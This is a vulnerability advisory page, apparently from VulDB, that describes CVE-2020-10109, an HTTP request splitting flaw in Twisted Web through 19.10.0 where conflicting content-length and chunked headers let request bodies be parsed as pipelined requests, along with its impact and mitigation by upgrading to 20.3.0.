CVE-2020-10109 in Twisted Web
Summary
by MITRE
In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request.
Be aware that VulDB is the high quality source for vulnerability data.
Analysis
by VulDB Data Team • 11/26/2024
The vulnerability identified as CVE-2020-10109 represents a critical HTTP request splitting flaw within the Twisted Web framework version 19.10.0 and earlier. This issue arises from improper handling of conflicting HTTP headers, specifically when both content-length and chunked encoding headers are present in a single request. The vulnerability stems from the framework's parsing logic that prioritizes the content-length header over chunked encoding, creating a dangerous condition where subsequent request data is interpreted as separate pipelined requests rather than part of the original payload.
This flaw falls under the CWE-1240 category, which specifically addresses HTTP request splitting vulnerabilities that occur when HTTP parsers fail to properly validate or handle conflicting headers. The technical implementation of this vulnerability allows an attacker to manipulate the HTTP request parsing behavior by crafting malicious requests containing both content-length and chunked encoding headers simultaneously. When the Twisted Web framework processes such requests, it adheres to the content-length specification while treating the remaining bytes in the request body as a new, separate HTTP request, effectively enabling request smuggling and cross-site scripting attacks.
The operational impact of this vulnerability extends beyond simple request manipulation, as it can be exploited to bypass security controls, perform session hijacking, and execute unauthorized operations within the affected system. Attackers can leverage this weakness to inject malicious requests into the pipeline, potentially gaining access to protected resources or manipulating application behavior through carefully crafted header combinations. The vulnerability particularly affects web applications that rely on Twisted Web for handling HTTP traffic and may be exploited in scenarios involving proxy servers, load balancers, or any system that processes HTTP requests with potentially conflicting headers.
Mitigation strategies for CVE-2020-10109 should focus on upgrading to Twisted Web version 20.3.0 or later, where the parsing logic has been corrected to properly handle conflicting headers according to HTTP specifications. Organizations should also implement strict header validation at the application level, ensuring that content-length and chunked encoding headers are not simultaneously present in HTTP requests. Additionally, network security controls such as web application firewalls should be configured to detect and block requests containing conflicting HTTP headers, aligning with the ATT&CK technique T1190 for exploiting vulnerabilities in web applications. The fix implemented in newer versions addresses the core parsing logic issue by enforcing proper HTTP protocol compliance and preventing the unintended interpretation of request body data as separate HTTP requests.